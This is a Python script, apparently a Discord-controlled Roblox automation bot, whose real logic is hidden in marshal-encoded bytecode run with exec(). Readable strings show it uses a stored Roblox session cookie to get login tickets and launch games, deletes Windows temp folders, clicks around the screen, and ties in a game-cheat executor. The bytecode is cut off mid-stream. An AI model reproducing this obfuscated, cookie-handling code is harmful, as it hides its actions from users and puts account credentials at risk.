
import os
try:   
    import marshal
    import asyncio
    import random
    import subprocess
    import sys
    import webbrowser
    import nextcord
    from nextcord.ext import commands
    import undetected_chromedriver as uc
    import aiohttp
    from psutil import process_iter
    import requests
    import json
    from os import listdir
    from os.path import isfile, join
    import datetime
    from datetime import date
    from datetime import datetime
    import threading
    import shutil
    import pyautogui as pg
    import time
    import wget
    from PIL import ImageGrab
    import psutil
    import zipfile
    from selenium import webdriver
except:
    os.system('pip install asyncio')
    os.system('pip install subprocess')
    os.system('pip install webbrowser')
    os.system('pip install nextcord')
    os.system('pip install shutil')
    os.system('pip install wget')
    os.system('pip install aiohttp')
    os.system('pip install datetime')
    os.system('pip install psutil')
    os.system('pip install undetected_chromedriver')
    os.system('pip install pyautogui')
    os.system('pip install selenium')
    os.system('pip install win32gui')
    os.system('pip install Image')
    os.system('pip install marshal')
    import marshal
    import asyncio
    import random
    import subprocess
    import sys
    import webbrowser
    import nextcord
    from nextcord.ext import commands
    import undetected_chromedriver as uc
    import aiohttp
    from psutil import process_iter
    import requests
    import json
    from os import listdir
    from os.path import isfile, join
    import datetime
    from datetime import date
    from datetime import datetime
    import threading
    import shutil
    import pyautogui as pg
    import time
    import wget
    from PIL import ImageGrab
    import psutil
    import zipfile
    from selenium import webdriver
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00@\x00\x00\x00s\x90\x04\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x02l\x06m\x07Z\x07\x01\x00d\x00d\x01l\x08Z\td\x00d\x01l\nZ\nd\x00d\x03l\x0bm\x0cZ\x0c\x01\x00d\x00d\x01l\rZ\rd\x00d\x01l\x0eZ\x0ed\x00d\x04l\x0fm\x10Z\x10\x01\x00d\x00d\x05l\x11m\x12Z\x12m\x13Z\x13\x01\x00d\x00d\x01l\x14Z\x14d\x00d\x06l\x14m\x15Z\x15\x01\x00d\x00d\x07l\x14m\x14Z\x14\x01\x00d\x00d\x01l\x16Z\x16d\x00d\x01l\x17Z\x17d\x00d\x01l\x18Z\x19d\x00d\x01l\x1aZ\x1ad\x00d\x01l\x0fZ\x0fd\x00d\x01l\x1bZ\x1bd\x00d\x01l\x0bZ\x0bd\x00d\x01l\x1cZ\x1cd\x00d\x08l\x1dm\x1eZ\x1e\x01\x00d\x00d\tl\x1fm Z \x01\x00zhe\x0e\xa0!e"d\nd\x0bd\x0cd\r\x8d\x03\xa1\x01Z#e#d\x0e\x19\x00Z$e#d\x0f\x19\x00Z%z\x06e#d\x10\x19\x00Z&W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\x11\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00z\x1ae#d\x12\x19\x00Z*g\x00d\x13\xa2\x01Z+e#d\x12\x19\x00e+v\x00r\xbfe\'d\x14\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\x15\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00z\x0fe#d\x16\x19\x00Z,e,d\x17k\x02r\xdbd\x18Z-n\x02d\x19Z-W\x00n\x06\x01\x00\x01\x00\x01\x00d\x18Z-Y\x00W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\x1a\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00zZg\x00a.d\x19a/e\x03j0d\x00\x19\x00Z1d\x1ba2e\x0f\xa03d\x1c\xa1\x01Z4e\x07j5d\x01d\x1d\x8d\x01Z6e\x05j7d\x1ed\x1f\x8d\x01Z8e\x05j9j:d e\x05j;j<d!\x8d\x02Z=e\x05j9j:d"e\x05j;j<d!\x8d\x02Z>e\x05j9j:d#e\x05j;j<d!\x8d\x02Z?e\x05j9j:d$e\x05j;j<d!\x8d\x02Z@e\x05j9j:d%e\x05j;j<d!\x8d\x02ZAe\x05j9j:d&e\x05j;jBd!\x8d\x02ZCW\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\'\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00d(d)\x84\x00ZDd*d+\x84\x00ZEd,d-\x84\x00ZFd.d/\x84\x00ZGd0d1\x84\x00ZHd2d3\x84\x00ZId4d5\x84\x00ZJd6d7\x84\x00ZKd8d9\x84\x00ZLd:d;\x84\x00ZMd<d=\x84\x00ZNd>d?\x84\x00ZOd@dA\x84\x00ZPdBdC\x84\x00ZQG\x00dDdE\x84\x00dEe\x05j9jR\x83\x03ZSG\x00dFdG\x84\x00dGe\x05j9jR\x83\x03ZTG\x00dHdI\x84\x00dIe\x05j9jR\x83\x03ZUG\x00dJdK\x84\x00dKe\x05j9jR\x83\x03ZVG\x00dLdM\x84\x00dMe\x05j9jW\x83\x03ZXG\x00dNdO\x84\x00dOe\x05j9jW\x83\x03ZYG\x00dPdQ\x84\x00dQe\x05j9jW\x83\x03ZZG\x00dRdS\x84\x00dSe\x05j9jW\x83\x03Z[G\x00dTdU\x84\x00dUe\x05j9jW\x83\x03Z\\G\x00dVdW\x84\x00dWe\x05j9jW\x83\x03Z]G\x00dXdY\x84\x00dYe\x05j9jW\x83\x03Z^e6j_dZd[\x84\x00\x83\x01Z`t/\x90\x02rFz%t/\x90\x02r2z\x07e6\xa0ae%\xa1\x01\x01\x00W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\\\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00z\x05eG\x83\x00\x01\x00W\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00W\x00n\r\x01\x00\x01\x00\x01\x00e\'d]\x83\x01\x01\x00e\x1a\xa0bd^\xa1\x01\x01\x00Y\x00t/\x90\x02s\x0ed\x01S\x00d\x01S\x00)_\xe9\x00\x00\x00\x00N)\x01\xda\x08commands)\x01\xda\x0cprocess_iter)\x01\xda\x07listdir\xa9\x02\xda\x06isfile\xda\x04join)\x01\xda\x04date)\x01\xda\x08datetime)\x01\xda\twebdriver)\x01\xda\tImageGrabz\x0bconfig.json\xda\x01r\xda\x04utf8)\x01\xda\x08encodingZ\x0bwebhook_urlZ\tBot_TokenZ\rRoblox_Cookiez\x1aConfig Error Roblox CookieZ\nChannel_Id)\x12l\x04\x00\x00\x00z\x00\x08}\xd8x\x85nl\x04\x00\x00\x00\x0b@\x88b>>\xc2tl\x04\x00\x00\x00\x1e\x10\x88|\xe3W\xfatl\x04\x00\x00\x00d \x88\\f|\x01ul\x04\x00\x00\x00\x8f\x10\x08\x12\x831\xadwl\x04\x00\x00\x00ZP\x08U\xe76\xc0yl\x04\x00\x00\x00\x14\x00\x85"\xd5\x16\xbcil\x04\x00\x00\x00\x1e0\x84\x19u\x01\xe7hl\x04\x00\x00\x00y\x10\x08t\xcf0\xb7yl\x04\x00\x00\x00\n \x044\xe4\\\xe6hl\x04\x00\x00\x002 \x08c\xee\x17\xc4yl\x04\x00\x00\x00\x00\x00\x88z*>\x1cvl\x04\x00\x00\x00F \x08S/\x11Dwl\x04\x00\x00\x00=@\x88JA\x1c\x8fsl\x04\x00\x00\x00\x06 \x84lxi\xe6hl\x04\x00\x00\x00\x0b \x044\xe4\\\xe6hl\x04\x00\x00\x00\x14@\x88&^}\xc0pl\x04\x00\x00\x00\n@\x88\x15\xcas\xcbsz!Config Error Back List Channel Idz\x17Config Error Channel IdZ\x08Syx_Part\xda\x00FTz\x0cconfig error\xe9d\x00\x00\x00\xda\x07APPDATA)\x01Z\x0chelp_commanduH\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94-\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 \xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3 \xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94-\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 \xe0\xb9\x80\xe0\xb8\x81\xe0\xb8\xa1 Roblox\xa9\x01\xda\x05titleu$\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94\xe0\xb9\x80\xe0\xb8\x82\xe0\xb9\x89\xe0\xb8\xb2 Blox Fruits)\x02\xda\x05label\xda\x05styleu\x1a\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 Roblox Playeru\x17\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 web Robloxu0\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x82\xe0\xb9\x89\xe0\xb8\xb2-\xe0\xb8\xad\xe0\xb8\xad\xe0\xb8\x81 \xe0\xb8\x97\xe0\xb8\xb8\xe0\xb8\x81 20 \xe0\xb8\x99\xe0\xb8\xb2\xe0\xb8\x97\xe0\xb8\xb5u\x0c\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94u\t\x00\x00\x00\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94z\x14Error global, Buttonc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00s\x9a\x00\x00\x00\x81\x01z4t\x00\xa0\x01\xa1\x004\x00I\x00d\x00H\x00\x9a\x1e}\x01t\x02j\x03j\x04t\x05|\x01d\x01\x8d\x02}\x02|\x02j\x06|\x00d\x02\x8d\x01I\x00d\x00H\x00\x01\x00W\x00d\x00\x04\x00\x04\x00\x83\x03I\x00d\x00H\x00\x01\x00W\x00d\x00S\x001\x00I\x00d\x00H\x00s.w\x01\x01\x00\x01\x00\x01\x00Y\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00t\x07d\x03\x83\x01D\x00]\x06}\x03t\x08d\x04\x83\x01\x01\x00q=t\t\x83\x00\x01\x00t\n\x83\x00\x01\x00Y\x00d\x00S\x00)\x05N)\x01\xda\x07session\xa9\x01\xda\x05embedr\x10\x00\x00\x00z\x0eWeb Hook Error)\x0b\xda\x07aiohttpZ\rClientSession\xda\x08nextcordZ\x07WebhookZ\x08from_url\xda\nwebhookurl\xda\x04send\xda\x05range\xda\x05print\xda\x05input\xda\x04quit)\x04r\x18\x00\x00\x00r\x16\x00\x00\x00Z\x07webhook\xda\x02pp\xa9\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x07logsendN\x00\x00\x00s\x16\x00\x00\x00\x02\x80\x02\x01\x12\x01\x10\x01\x14\x012\xfe\x06\x03\x0c\x01\n\x01\x06\x01\x0c\x01r#\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00sR\x00\x00\x00d\x01}\x01t\x00\x83\x00D\x00]\x11\x89\x00t\x01\x87\x00f\x01d\x02d\x03\x84\x08|\x00D\x00\x83\x01\x83\x01r\x16|\x01d\x047\x00}\x01q\x05|\x01d\x04k\x05r\x1ft\x02j\x03j\x04S\x00|\x01d\x04k\x01r\'t\x02j\x03j\x05S\x00d\x00S\x00)\x05Nr\x01\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x003\x00\x00\x00s\x1c\x00\x00\x00\x81\x00|\x00]\t}\x01|\x01\x88\x00\xa0\x00\xa1\x00v\x00V\x00\x01\x00q\x02d\x00S\x00\xa9\x01N)\x01\xda\x04name)\x02\xda\x02.0Z\x07procstr\xa9\x01\xda\x07processr"\x00\x00\x00r\x0f\x00\x00\x00\xda\t<genexpr>[\x00\x00\x00s\x04\x00\x00\x00\x02\x80\x1a\x00z\x1bcappopen.<locals>.<genexpr>\xe9\x01\x00\x00\x00)\x06r\x03\x00\x00\x00\xda\x03anyr\x1a\x00\x00\x00\xda\x0bButtonStyle\xda\x05green\xda\x03red)\x02Z\x07appname\xda\x01pr"\x00\x00\x00r\'\x00\x00\x00r\x0f\x00\x00\x00\xda\x08cappopenX\x00\x00\x00s\x0e\x00\x00\x00\x04\x01\n\x01\x16\x01\x08\x01\x02\x80\x10\x01\x14\x01r0\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x0c\x00\x00\x00C\x00\x00\x00s\xb4\x01\x00\x00d\x01}\x00d\x02t\x00\xa0\x01\xa1\x00\x17\x00d\x03\x17\x00d\x04g\x02}\x01d\x05}\x02d\x05}\x03d\x06}\x04d\x05}\x05|\x01D\x00]\x8a}\x06t\x00\xa0\x02|\x06\xa1\x01D\x00]\x82}\x07t\x00j\x03\xa0\x04|\x06|\x07\xa1\x02}\x08|\x08\xa0\x05d\x07\xa1\x01}\t|\x08|\td\x08\x17\x00d\x00\x85\x02\x19\x00}\nzJt\x00j\x03\xa0\x06|\x08\xa1\x01rUt\x00\xa0\x07|\x08\xa1\x01\x01\x00t\x08|\x00\x9b\x00d\t|\n\x9b\x00\x9d\x03\x83\x01\x01\x00|\x04d\n|\n\x9b\x00d\x0b\x9d\x037\x00}\x04|\x02d\x08\x17\x00}\x02n\'t\x00j\x03\xa0\t|\x08\xa1\x01r||\x08\xa0\nd\x0c\xa1\x01rbW\x00q\x1dt\x0b\xa0\x0c|\x08\xa1\x01\x01\x00|\x04d\r|\n\x9b\x00d\x0b\x9d\x037\x00}\x04t\x08|\x00\x9b\x00d\x0e|\n\x9b\x00\x9d\x03\x83\x01\x01\x00|\x03d\x08\x17\x00}\x03W\x00q\x1d\x04\x00t\ry\x9f\x01\x00}\x0b\x01\x00z\x16t\x08|\x0b\x83\x01\x01\x00|\x04d\x0f|\n\x9b\x00d\x0b\x9d\x037\x00}\x04|\x05d\x087\x00}\x05W\x00Y\x00d\x00}\x0b~\x0bq\x1dd\x00}\x0b~\x0bw\x01w\x00q\x16|\x04d\x10t\x0e|\x02\x83\x01\x17\x00d\x11\x17\x00t\x0e|\x03\x83\x01\x17\x00d\x12\x17\x007\x00}\x04|\x04d\x137\x00}\x04d\x14d\x15|\x04d\x16d\x17\x9c\x03g\x01d\x18\x9c\x02}\x0ct\x0fj\x10t\x11t\x12\xa0\x13|\x0c\xa1\x01d\x19d\x1ai\x01d\x1b\x8d\x03}\rd\x1ct\x0e|\x02\x83\x01\x17\x00d\x11\x17\x00t\x0e|\x03\x83\x01\x17\x00d\x12\x17\x00S\x00)\x1dNz\x05\x1b[32mz\tC:/Users/z\x13/AppData/Local/Tempz\x0fC:/Windows/Tempr\x01\x00\x00\x00z\x08```Diff\n\xfa\x01\\r*\x00\x00\x00z\x16Success: deleted file z\x18+ Success: deleted file \xda\x01\nZ\nchocolateyz\x1a+ Success: deleted folder z\x18Success: deleted folder z\x17- Fail: deleted folder z\t+deleted z\x0b files and z\t folders.z\x03```z\x08log tempZ\x04Tempi\x00\x00\xff\x00)\x03r\x13\x00\x00\x00\xda\x0bdescription\xda\x05color)\x02\xda\x07contentZ\x06embedsz\x0cContent-Typez\x10application/json)\x02\xda\x04data\xda\x07headersz\x08deleted )\x14\xda\x02os\xda\x08getloginr\x04\x00\x00\x00\xda\x04pathr\x07\x00\x00\x00\xda\x04findr\x06\x00\x00\x00\xda\x06unlinkr\x1e\x00\x00\x00\xda\x05isdir\xda\x0c__contains__\xda\x06shutil\xda\x06rmtree\xda\tException\xda\x03str\xda\x08requests\xda\x04postr\x1b\x00\x00\x00\xda\x04json\xda\x05dumps)\x0eZ\x05GreenZ\x04fereZ\x0fdeleteFileCountZ\x11deleteFolderCount\xda\x05eeeeeZ\x05faileZ\x06folderZ\x08the_fileZ\tfile_pathZ\x07indexNoZ\x08itemName\xda\x01e\xda\x07payload\xda\x08responser"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x05ctemp_\x00\x00\x00sT\x00\x00\x00\x04\x01\x14\x02\x04\x01\x04\x01\x04\x01\x04\x01\x08\x03\x0e\x01\x0e\x01\n\x01\x10\x01\x02\x01\x0c\x01\n\x01\x12\x01\x10\x01\n\x01\x0c\x01\x0e\x01\n\x01\x10\x01\x12\x01\x08\x01\x04\x80\x0e\x01\x08\x01\x10\x01\x14\x01\x08\x80\x02\xfd\x02\xf0 \x14\x08\x01\x02\x03\x02\x03\x02\x01\x02\x01\x04\xfd\x02\xff\x06\xfe\x1a\n\x1c\x02rK\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00sb\x00\x00\x00t\x00r-t\x01\x9b\x00d\x01\x9d\x02\x89\x00\x87\x00f\x01d\x02d\x03\x84\x08t\x02\xa0\x03\x88\x00\xa1\x01D\x00\x83\x01}\x00|\x00D\x00]\x19}\x01d\x04|\x01v\x00s\x1fd\x05|\x01v\x00r"\x01\x00d\x00S\x00|\x01\xa0\x04d\x06\xa1\x01r,t\x05\xa0\x06|\x01\xa1\x01\x01\x00q\x15d\x00S\x00d\x00S\x00)\x07N\xfa\x04/binc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00\x13\x00\x00\x00s&\x00\x00\x00g\x00|\x00]\x0f}\x01t\x00j\x01\xa0\x02t\x00j\x01\xa0\x03\x88\x00|\x01\xa1\x02\xa1\x01r\x02|\x01\x91\x02q\x02S\x00r"\x00\x00\x00)\x04r8\x00\x00\x00r:\x00\x00\x00r\x06\x00\x00\x00r\x07\x00\x00\x00\xa9\x02r&\x00\x00\x00\xda\x01f\xa9\x01Z\x06mypathr"\x00\x00\x00r\x0f\x00\x00\x00\xda\n<listcomp>\x93\x00\x00\x00s\x02\x00\x00\x00&\x00z\x1egetnamesyx.<locals>.<listcomp>\xfa\x1eCefSharp.BrowserSubprocess.exe\xfa\x0elua-decomp.exez\x04.exe)\x07\xda\x06syxrun\xda\x03syxr8\x00\x00\x00r\x04\x00\x00\x00\xda\x08endswith\xda\x02ee\xda\x06append)\x02\xda\tonlyfiles\xda\x02oor"\x00\x00\x00rO\x00\x00\x00r\x0f\x00\x00\x00\xda\ngetnamesyx\x8f\x00\x00\x00s\x12\x00\x00\x00\x04\x01\n\x02\x18\x01\x08\x01\x16\x01\x14\x01\x02\x80\x04\xfa\x04\x04rZ\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s\x82\x00\x00\x00z:t\x00\xa0\x01\xa1\x00}\x01|\x00|\x01j\x02d\x01<\x00|\x01j\x03d\x02d\x03|\x01j\x03d\x02d\x04\x8d\x01j\x04d\x05\x19\x00d\x06\x9c\x02d\x07\x8d\x02j\x04d\x08\x19\x00}\x01d\t}\x02t\x05\xa0\x06d\nd\x0b\xa1\x02}\x03t\x07\xa0\x08d\x0c|\x01\x9b\x00d\r|\x03\x9b\x00d\x0e|\x02\x9b\x00d\x0f|\x03\x9b\x00d\x10\x9d\t\xa1\x01\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00Y\x00d\x00S\x00)\x11N\xfa\x0e.ROBLOSECURITYz1https://auth.roblox.com/v1/authentication-ticket/z\x17https://www.roblox.com/\xa9\x01\xda\x03url\xfa\x0cX-CSRF-Token)\x02Z\x07Refererr^\x00\x00\x00)\x02r]\x00\x00\x00r7\x00\x00\x00z\x19RBX-Authentication-Ticketl\x03\x00\x00\x00\x9djJH\x02\x00i\x80\x96\x98\x00i\xff\xe0\xf5\x05z)roblox-player:1+launchmode:play+gameinfo:z\x8b+launchtime:1+placelauncherurl:https%3A%2F%2Fassetgame.roblox.com%2Fgame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3Dz\r%26placeId%3Dz/%26isPlayTogetherGame%3Dfalse+browsertrackerid:z$+robloxLocale:en_us+gameLocale:en_us)\trC\x00\x00\x00r\x16\x00\x00\x00\xda\x07cookiesrD\x00\x00\x00r7\x00\x00\x00\xda\x06random\xda\x07randint\xda\nwebbrowser\xda\x04open)\x04\xda\tRawCookieZ\x0bGamesessionZ\x07PlaceIdZ\tBrowserIDr"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x08joingame\x97\x00\x00\x00s\x10\x00\x00\x00\x02\x01\x08\x01\n\x01(\x01\x04\x01\x0c\x01*\x01\x0c\x01re\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00|\x00r,t\x00r$t\x01|\x00d\x01\x83\x02\\\x02}\x01}\x02d\x02\xa0\x02|\x01|\x02\xa1\x02}\x03t\x03d\x03|\x03\x9b\x00\x9d\x02d\x04d\x05\x8d\x02\x01\x00t\x04\xa0\x05d\x06\xa1\x01\x01\x00|\x00d\x068\x00}\x00n\x04|\x00|\x008\x00}\x00|\x00s\x02d\x00S\x00d\x00S\x00)\x07N\xe9<\x00\x00\x00z\r{:02d}:{:02d}z\x0bRe LogIn : \xfa\x01\r)\x01\xda\x03endr*\x00\x00\x00)\x06\xda\x05ggggg\xda\x06divmod\xda\x06formatr\x1e\x00\x00\x00\xda\x04time\xda\x05sleep)\x04\xda\x01tZ\x04minsZ\x04secsZ\x05timerr"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\tcountdown\xa0\x00\x00\x00s\x12\x00\x00\x00\x04\x02\x04\x01\x0e\x01\x0c\x01\x12\x01\n\x01\n\x01\x08\x02\x0c\xf8ro\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sX\x00\x00\x00t\x00r*t\x01d\x01\x83\x01d\x02k\x02r t\x02\xa0\x03\xa1\x00}\x00t\x02\xa0\x04d\x03\xa1\x01}\x01t\x05|\x01\x83\x01\x01\x00t\x02\xa0\x06|\x01\xa1\x01\x01\x00t\x02\xa0\x07|\x00\xa1\x01\x01\x00n\x01\t\x00t\x08\xa0\td\x04\xa1\x01\x01\x00t\x00s\x02d\x00S\x00d\x00S\x00)\x05N\xda\x012\xda\x02okz\x0b./lib/2.png\xe9\x02\x00\x00\x00)\n\xda\x05ggfdf\xda\x08chackimg\xda\x02pg\xda\x08position\xda\x14locateCenterOnScreenr\x1e\x00\x00\x00Z\x05click\xda\x06moveTorl\x00\x00\x00rm\x00\x00\x00)\x02rG\x00\x00\x00Z\x02e6r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x08youtube1\xab\x00\x00\x00s\x14\x00\x00\x00\x04\x02\x0c\x01\x08\x01\n\x01\x08\x01\n\x01\x0c\x01\x02\x01\n\x01\x0c\xf8ry\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00t\x00\xa0\x01\xa1\x00}\x01t\x00\xa0\x02d\x01|\x00\x9b\x00d\x02\x9d\x03\xa1\x01}\x02t\x00\xa0\x03|\x02\xa1\x01\x01\x00t\x00\xa0\x01\xa1\x00}\x03|\x03|\x02k\x02r!t\x00\xa0\x03|\x01\xa1\x01\x01\x00d\x03S\x00d\x04S\x00)\x05Nz\x06./lib/z\x04.pngrq\x00\x00\x00\xda\x03err)\x04ru\x00\x00\x00rv\x00\x00\x00rw\x00\x00\x00rx\x00\x00\x00)\x04Z\x03imgrG\x00\x00\x00Z\x05wandbZ\x04eeeer"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00rt\x00\x00\x00\xb6\x00\x00\x00s\x10\x00\x00\x00\x08\x01\x12\x01\n\x01\x08\x01\x08\x01\n\x01\x04\x01\x04\x02rt\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\x94\x00\x00\x00t\x00j\x01\xa0\x02d\x01\xa1\x01}\x00z9t\x03|\x00d\x02\x83\x02\x8f)}\x01t\x04\xa0\x05|\x01\xa1\x01}\x02t\x00j\x01\xa0\x06|\x02d\x03\x19\x00\xa1\x01}\x03t\x00\xa0\x07|\x03t\x00j\x08\xa1\x02s+\t\x00W\x00d\x00\x04\x00\x04\x00\x83\x03\x01\x00W\x00d\x00S\x00|\x03W\x00\x02\x00d\x00\x04\x00\x04\x00\x83\x03\x01\x00W\x00S\x001\x00s8w\x01\x01\x00\x01\x00\x01\x00Y\x00\x01\x00W\x00d\x00S\x00\x04\x00t\tyI\x01\x00\x01\x00\x01\x00Y\x00d\x00S\x00w\x00)\x04Nz0%PROGRAMDATA%\\Riot Games\\RiotClientInstalls.jsonr\x0c\x00\x00\x00Z\nrc_default)\nr8\x00\x00\x00r:\x00\x00\x00\xda\nexpandvarsrc\x00\x00\x00rE\x00\x00\x00\xda\x04load\xda\x07abspath\xda\x06access\xda\x04X_OK\xda\x11FileNotFoundError)\x04Z\x12riot_installs_path\xda\x04fileZ\x0fclient_installsZ\x08rcs_pathr"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0cget_rcs_path\xc0\x00\x00\x00s\x1a\x00\x00\x00\x0c\x01\x02\x01\x0c\x01\n\x01\x10\x01\x0e\x01\x02\x01\x12\xfc\x02\x05(\xfb\x0c\x06\x06\x01\x02\xffr\x82\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0e\x00\x00\x00C\x00\x00\x00s\xb8\x00\x00\x00z\x0bt\x00j\x01d\x01d\x02\x8d\x01\x04\x00}\x00}\x00W\x00|\x00S\x00\x01\x00\x01\x00\x01\x00z\nt\x02j\x01d\x03d\x04\x8d\x01}\x00W\x00Y\x00|\x00S\x00\x01\x00\x01\x00\x01\x00d\x05}\x01t\x03\xa0\x04|\x01\xa1\x01}\x02|\x02j\x05}\x03d\x06|\x03\x17\x00d\x07\x17\x00}\x04t\x06\xa0\x07|\x04d\x08\xa1\x02}\x05t\x08\xa0\t|\x05d\t\xa1\x02\x8f\x0c}\x06|\x06\xa0\n\xa1\x00\x01\x00W\x00d\x00\x04\x00\x04\x00\x83\x03\x01\x00n\x081\x00sHw\x01\x01\x00\x01\x00\x01\x00Y\x00\x01\x00t\x0b\xa0\x0c|\x05\xa1\x01\x01\x00t\x02j\x01d\x03d\x04\x8d\x01}\x00Y\x00Y\x00|\x00S\x00)\nNT)\x01Z\x0euse_subprocessz\x10chromedriver.exe)\x01Z\x0fexecutable_pathz:https://chromedriver.storage.googleapis.com/LATEST_RELEASEz,https://chromedriver.storage.googleapis.com/z\x17/chromedriver_win32.zipz\x10chromedriver.zipr\x0c\x00\x00\x00)\r\xda\x02ucZ\x06Chromer\n\x00\x00\x00rC\x00\x00\x00\xda\x03get\xda\x04text\xda\x04wgetZ\x08download\xda\x07zipfile\xda\x07ZipFile\xda\nextractallr8\x00\x00\x00\xda\x06remove)\x07\xda\x06driverr]\x00\x00\x00rJ\x00\x00\x00Z\x0eversion_numberZ\x0cdownload_urlZ\x11latest_driver_zipZ\x07zip_refr"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\nopenroblox\xcb\x00\x00\x00s"\x00\x00\x00\x02\x01\x12\x01\x04\r\x06\xf4\x02\x01\x10\x01\x04\n\x06\xf7\x04\x01\n\x01\x06\x01\x0c\x01\x0c\x014\x01\n\x01\x10\x01\x04\x01r\x8c\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s`\x00\x00\x00t\x00\x83\x00a\x01t\x01\xa0\x02d\x01\xa1\x01\x01\x00t\x01\xa0\x03\xa1\x00\x01\x00z\x0ft\x01\xa0\x04d\x02d\x03d\x04d\x05d\x06d\x04t\x05d\x07\x9c\x07\xa1\x01\x01\x00W\x00n\x08\x01\x00\x01\x00\x01\x00t\x06d\x08\x83\x01\x01\x00Y\x00t\x01\xa0\x02d\x01\xa1\x01\x01\x00\t\x00t\x07\xa0\x08d\t\xa1\x01\x01\x00q*)\nNz\x1bhttps://web.roblox.com/homez\x0b.roblox.comi\x06\x96ueTr[\x00\x00\x00\xfa\x01/)\x07\xda\x06domainZ\x06expiryZ\x08httpOnlyr%\x00\x00\x00r:\x00\x00\x00\xda\x06secure\xda\x05valuez\x0ccookie 